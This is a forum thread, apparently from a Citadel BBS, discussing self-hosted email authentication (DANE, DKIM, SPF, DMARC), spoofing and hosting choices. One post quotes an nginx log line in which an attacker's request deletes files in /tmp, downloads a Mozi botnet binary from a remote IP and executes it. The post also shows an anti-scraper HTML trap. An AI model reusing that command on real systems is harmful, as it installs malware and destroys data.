Oh yeah ... constantly.  In particular they're constantly scanning my web server.  Fortunately I have some safeguards in place.

Heh.  Here's a fun one:

Mar 28 21:25:50 www nginx[4948]: www nginxaccess: 36.49.65.2 - - [28/Mar/2026:21:25:50 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http
://36.49.65.2:56495/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 153 "-" "Hello, world"

It's so fun to get random hits from lowlifes who think all the world's an unpatched Wordpress from 2005.

Even better is the scrapers who try to crawl my git server, ignorantly slurping every version of every change on every file for the last 30 years.  I eventually had to change my cgit setup so that if a non-human tries to traverse cgit, they get this:

<html><head><title>Identity Verification - 习近平 小熊维尼 Xi Jinping Winnie the Pooh</title><meta name='description' content='1989
Tiananmen Square. Free Tibet. 习近平 1989年6月4日'></head><body style='font-family:sans-serif;text-align:center;padding:50px;'><scri
pt>document.cookie='cgit_access=verified;path=/;max-age=86400';location.reload();</script><h2>Verifying Connection...</h2><p>习近平
looks exactly like Winnie the Pooh.</p><div style='display:none;'>June 4 1989 Tiananmen Square massacre. Taiwan is a country.</div><
/body></html>

A real hacker visiting my repo will be using a web browser that immediately hits the reload.  Alibaba Cloud (which was the biggest culprit) ingests those strings, trips up the Great Firewall of China, and pretty soon my site is "poison" and gets blocked to the scrapers.  Problem solved.

DANE / DNSSEC and MTA-STS is no problem with Citadel to setup. 

I have running it. The only problem for DANE is, not all DNS offer TLSA as own entry. A "fake" entry over TXT doesnt work anymore. 

If youre using Cloudflare, you are fine to get all things running. 

Cheers

Mike

Mi Mai 22 2024 11:15:20 UTC von Nurb432

Moving people to ' centralized DNS' a goal perhaps?  To better control, block, and monitor...and of course: 'profit!'

 

"sorry, you are not in the club, your DNS infrastructure does not count, so piss-off"

Wed May 22 2024 07:10:08 EDT from darknetuser

I was reading at ADMIN Magazine that there is a bit of a push to get DANE set up for your smtp. I have never noticed it being enforced, but just as with DMARC and company, if it reaches a certain mass it will be, which SUCKS, because in order to have DANE work in sync with your certificates you either need a DNS provider with an API you can use to rekey, or you need to run your own DNS infrastructure, or you need to do rekey manually. Which SUCKS.

 

Dont be surprised if somehow we end up back there. Perhaps not in exact terms, but the same effect. 

Fri May 24 2024 12:31:22 EDT from IGnatius T Foobar

 but the "masters of the universe" certainly regret that.

Moving people to ' centralized DNS' a goal perhaps?  To better control, block, and monitor...and of course: 'profit!'

"sorry, you are not in the club, your DNS infrastructure does not count, so piss-off"

Wed May 22 2024 07:10:08 EDT from darknetuser

I was reading at ADMIN Magazine that there is a bit of a push to get DANE set up for your smtp. I have never noticed it being enforced, but just as with DMARC and company, if it reaches a certain mass it will be, which SUCKS, because in order to have DANE work in sync with your certificates you either need a DNS provider with an API you can use to rekey, or you need to run your own DNS infrastructure, or you need to do rekey manually. Which SUCKS.

It's static again at this point. BUT its a residential subnet as far as i understand.. its not 'business class' just that i had to get static to get off a silly ass 'neighborhood NAT' to allow incoming connections. it was cheaper doing that then buying an incoming VPN, with static. It was decades ago when i went thru that nonsense with an older ISP ( that no longer exists .it was bought up by Comcast ). I have been back on static for at least 15 years now with a fiber company. 

I guess ill tell the story, short version:

ISP was in a crunch for addresses or something. Rumor is they gave out too many and for some reason could not get more allocated to them.. hit a wall, so to speak. 

After several years, one weekend i was off line for the weekend. I forget why now.  Monday i got back on line, got a random address.   Called them to ask why. "you violated your contract so we terminated your static IP"  "wtf, what"  "the contract states you must use it, we saw that you did not use it for 24 hours so the contract was in violation"..  "can i pay to get it back" "no"  They were not my ISP by end of the week.

Sat May 18 2024 23:58:35 EDT from IGnatius T Foobar

I definitely wouldn't try to host email on a dynamic address. 

Umm 3 decades ago... where has the time gone. 

Oh and ill peek at startmail.

MxRoute seems a viable choice, but they are lacking in the support department if you run into issues. Basically: " if you are not an expert, dont come here we dont want you "

Ya i have my own domain.

I used to host it myself a couple of decades ago ( using what server, you get one guess :)  )  but mid 90s i started having some issues with non-delivery, then my static IP was yanked from me, and instead of fighting  i shut it all down and went with a traditional hosting service. ( my ISP at the time did not want to give them out anymore even at an additional cost, and used an excuse to get rid of mine, funny story actually.  This was still dialup days..  sooooo long ago )

But.. since IG just announced DKIM, im wondering if i should just bring it back home.  Of course keep the domain parked + DNS control, but just toss in the towel for hosting.

Just me.

Couple of aliases are nice, but its really one account.

Sat May 18 2024 14:41:16 EDT from darknetuser

How many users do you need to serve? Do you want a managed email solution, or is ummanaged fine?

Would be helpful to a lot of people... 

Sat May 18 2024 11:46:21 EDT from IGnatius T Foobar

I'd like to write an easy-to-follow guide on how to self host your email and live to tell the tale. 

You are trying to get me to self-host again, aren't you?

9Front folks are going thru this same struggle it seems.

Wed May 08 2024 13:21:31 EDT from IGnatius T Foobar

Unfortunately it may not be enough. I've spent the last few weeks learning the details of how DKIM works, and writing a DKIM signature engine for Citadel.
It hasn't been easy. I intend to complete this before I do battle with the gmail gestapo again.

Ran across mxroute,  which has a option to pay 125, for life...

So related to all of this stuff...

Seems Bluehost has raised their hosting rates again. Im now paying almost 250 a year for hosting..  wtf..  While i could bring it back home again and seff-host, that is a lot of hassle ( part of why i quit doing it a couple of decades ago ), and these days id also have to go buy an incoming VPN too, or upgrade my fiber to business class ( i may be static, but its still a residential IP subnet ) and will end up close to the same amount i'm sure, so hassle + similar cost = not bother.

Not that 250 a year is going to break the bank or something but just for mail, its silly to pay that much.

Soooo seems im in the market for new mail hosting service that isn't stupid priced.   Any suggestions?    And im willing to move my domain to them too, as i bet that price got jacked up too.  I do NOT need web hosting or any other fun-features beyond being able to edit DNS A records if i move the domain.. its just mail. 

Not a real rush, i just renewed for the year as it was going to die Monday, but its on my agenda this summer/fall to decide on an alternative plan.  

SPF is supposedly setup. Cant say about DMARC, not a mail expert, but i had the hosting people do stuff for me. Hey, i pay my bill, they can help :)

not naming names, but they are a large provider, been around 20 years.  I moved to them around 15 years ago, if i remember right. 

Wed Oct 18 2023 19:23:51 EDT from darknetuser

Maybe send an email from your hosted email to a main tester and check the headers to learn which stack they are running.

Most modern stacks will respect DMARC, so if you don't want to be flooded by email falselly sent from your domain, just add SPF and DMARC entries to your DNS and you will slash most spoofing down.

If you fear being flooded by random flooders, then I hope your mail host has the usual countermeasures (blacklists, greylisting and the like)

Right, but i thought with all the stuff they had in place, that would have stopped this too. Its not a HUGE risk since they cant use me as a relay, but i will take some time to close that hole too. Of course if one day i get flooded, that goes on the top of my to-do list..

Wed Oct 18 2023 16:46:39 EDT from darknetuser

That is pretty standard.

Lots of email service appliances don't get pesky about the origin of emails and just process anything they get sent to port 25.

If you are concerned about spoofing you set some DMARC policy. THat is what it is for.

Your PVE is not loging to your mail server or anything. It is just sending a regular email with the integrated postfix if ships with. What your remote email service sees is an email comming from another server addressed to an account the remote server controls.

for what its worth this is what i was using to test.  That its not a 'true' open proxy again, i wont panic but ill will get a hold of them later.

https://mxtoolbox.com/diagnostic.aspx

2099365978@Uncensored

Nope its not even a true login. its just a valid email.  i have it setup to forward several email addresses to my real one. But they dont have actual logins. ( common ones like sales, admin, etc ). PVE also does not ask for email login info, or even server, just asks for the admin email to send notices to.

I guess i can call the hosting service later this week as its not an 'emergency'. it passed all the 'checks' i ran. so i would have assumed this wasn't possible either.

Mon Oct 02 2023 13:07:03 EDT from IGnatius T Foobar

If it accepts that, your email server is not configured properly. Otherwise some spammer can come along and just send zillions of messages pretending to be you.

Are you sure you didn't perhaps give your username and password to PVE while configuring the mail server? Then it would log in.

So i know its basic, but never did understand why it worked.

I have hosted mail. I no longer self host, so its on a remote server, not even on my network. it has all the normal protections : Not a relay SPF, bla bla bla.   Run an online test and other than some initial connect speed it passes all checks.

So at home i have several devices. One of them is a PVE server. It will send email notices.  It has no local SMTP server. It has no login credentials to my mail server. Yet it can send mail to it..  

I understand its spoofing an account on my domain to send to an account on my domain ( its self.  ) but why does that still work, with all the protections from above active? Sure, it does not 'hurt' but it is an open door, of sorts, that could be used to spam the hell out of me..

At least its a step in the right direction. 

I took me several attempts to get stuff working right ( with my hosting people i dont know the buttons they pushed )

Fri Dec 10 2021 04:21:04 PM EST from IGnatius T Foobar Subject: Re: Spamhaus and domain registrars molest you right from the start ..

After setting up a DMARC record I am beginning to receive reports, but I'm not 100% sure how to read them. If I am reading them correctly, there may actually be spammer scum out in the wild spoofing my domain.

Here recently my domain got spoofed for a bit. ( long story. My hosting provider didnt lock things down by default, and i didnt know i had to look into all that stuff myself until it was too late.  Why it took them decades to find me, i donno )   I'm not 100% blacklisted but there are places i can no longer send mail to.   

I have had the domain since you could first register non-governmental names and *had* to deal with 'netsol' to do it. ( and back in the early 90s, god help you if you lost access to email due to being a dumbass and wanted to transfer the domain away to a provider instead of self-host.. another long story. about lost the name  )

Entire thing pisses me off

A real annoyance and "crime against decent puter users" is when a domain is blacklisted, and then you buy it, not knowing this.  But it's YOUR goddam problem now.  YOU did all those nasty things you spamming bastard.  And applying to get your name "cleared" is a government-like process similar to medieval torture.  It's not gonna happen, and is it even worth it?

I learned a lot about these shoddy "systems" while setting up Citadel.  Some domains were clean, others so dirty google wouldn't even put them in YOUR spam folder.  Like they never existed.  [Censorship?  Don't get me started.]  But I could see them on Thunderbird with my other mail server.  Naturally, I despise spam and mailing lists of any kind and wish them the worst.  But pointing the finger at someone "new" for someone else's bs is such shite.

That's all, I hope I posted in the right forum  :)

Hi everyone.

I have this error on port 25, on my RaspberryPi.

Unable to connect to the remote host:connection refused.

And the netstat -ntlp | grep 25 shows me this:

tcp 0  127.0.0.1:25   0.0.0.0:*   LISTEN 369/msmtpd

Any chance of making it listen on all interfaces? how exacty should I do that? Thanks in advance....

I have found mine does whatever it wants.  Does not always update, i cant always mark all as read... Mind of its own.

Sat Jan 16 2021 11:53:50 EST from sethmhur

is there anyway to tell thunderbird how many messages to download
instead of downloading all of them?

Worse when the text alternative is so badly formed that it has an entirely different meaning.  I have had messages that were missing plain text items.  Parts from the "fancy" html versions that should have been in the plain text version but were not, and changed the meaning of the email entirely.  Multiple mail user agents confirmed it for me (Mutt, Alpine, webmail plain text view).  Ugh.

Thanks IG!  That's pretty cool, and easy to understand.

I installed the OS and then installed but did not configure Apache.

I then selected Citadel as the emaile server. There was a good tutorial it seemed. I got to the instructions sudo /usr/lib/citadel-server/setup and it does not find the setup app. I looked at the folder and it was empty.

Is this supported on the pi4?

Did I miss an instruction?

I did try to uninstall and reinstall, but that did not do much. The install did not bring up any prompts.

TIA.

Hi,  i would like some more information on the citadel "listserv" feature. What mailing list does the citadel suite use? Can it be used to send announcement only type messages, or is it just for discussion lists? Is it easy to send bulk mail? (i am thinking in the hundreds not thousands)

Mike

um, you can make him an address for gmail that isn't the same as yours. like ArthurDent (instead of ArtDent) or MrArtDent, or ArtDentSr.

Mine is TrilMiddlename rather than TrilLastname. 

Yes, I just changed your last name to Dent. 
The question is whether your version of L, TU, & E says kneebiter or asshole? 

Any time my parents ask me what I do, I tell them to watch the movie Hackers. When they ask which one I am, I respond with yes.  

You are a scholar and a gentleman...

Because of past abuse, we've had to set things up so that new accounts need permission to send Internet mail.  I'll switch it on for you now.

I've been able to receive e-mails (on Uncensored Citadel) from external e-mail hosts, but the ones I've sent in reply were never delivered.  Is this a known glitch?

I just sent my first mail to my main list of nearly 100. 14 hard bounces - one soft. Gawd and i spent ages typing up those email addresses, and verifying the unintellagaqble ones.

Exciting stuff i have 5 openers, and one guy who has signed up for our newsletter/mailing list. (actually i remember this guys email as i had to check his domain, it was a real scrawl,

but glad i did, as he was a top lawyer from offices in the best lawyers addresses in London. We need legal help at the moment at our little market :) ) .

Anyway, i'm happy to get some news out to the people who left me their emails  just over 4 weeks ago.

I wish i had something stronger than a coke, or coffee right now. :)

Mon Aug 27 2018 14:23:45 EDT from Ragnar Danneskjold

Sorry - just a type. R and T are next to each other. Meant out.

lol! Everything between A and Z - (or Q & M ?) is fartoo close together for my claws of fingers.

Thanks Ragnar! You are the second person who has recomended Mailchimp. You said "our"? Do you work for Mailchimp?

Maybe third time lucky? I tried Mailgun, now Sendinblue...

Well the third party (sendinblue) just listed the two txt records, one spf, and one dkim to create on my ISP's (my domian host) DNS.

And here is  the spf record:    v=spf1 include:spf.sendinblue.com mx ~all   (that's obviously the record value, but the 'host' field is blank)

So it looks like that covers all emails coming from sendinblue?

They didnt tell me, for the dkim, you have to split the record up in to managable chunks, which my ISP done for me.

Hi,

I have a list of people i want to contact via email, around 100. It is for a small site i set up, to save the farmer's market i worked at in London. Basically this market was closed by the company which manages most London Farmer's markets, but the traders and the customers want to keep this market running. We have been negotiating with the school which hosts the market every Sunday, and need to get all the paperwork concerning a new contract sorted out before we can go forward. It looks like this will be a community run market, jointly operated by customers and traders for the local community (cutting out the middleman altogether, just paying rent to the school ) - if we can satisfy the school, with a watertight legal contract.

I collected nearly 100 names and email addresses on the last day of the market (it's shut now a couple of weeks, and we only had a few weeks notice) and would like to send them all an email, pointing them to the website, and online petition, plus mailing list/newsletter i have set up on this site, to keep up to date with the news.

The domain host suggested i get a third party email service to send so many emails, as they have strict filters which would not allow so many mails. After a few false starts, i have an account with Sendinblue, have my  domain authenticated, SPF and DKIM records set on my ISPs DNS and had them look over this also. All seems good.

I have set up a few test lists to send around 6 emails at a time to some of my friends and most mail ends up in the spam folders, especially gmail accounts. I have been telling my friends to check all mail from my domain, as 'not spam' and send me a reply - in the hope this might improve my reputation with gmail et al .

Is there anything else i can do?

( i presume, if i had my own citadel server up and running, i could have used the mailing list built in to citadel to send bulk mail ? )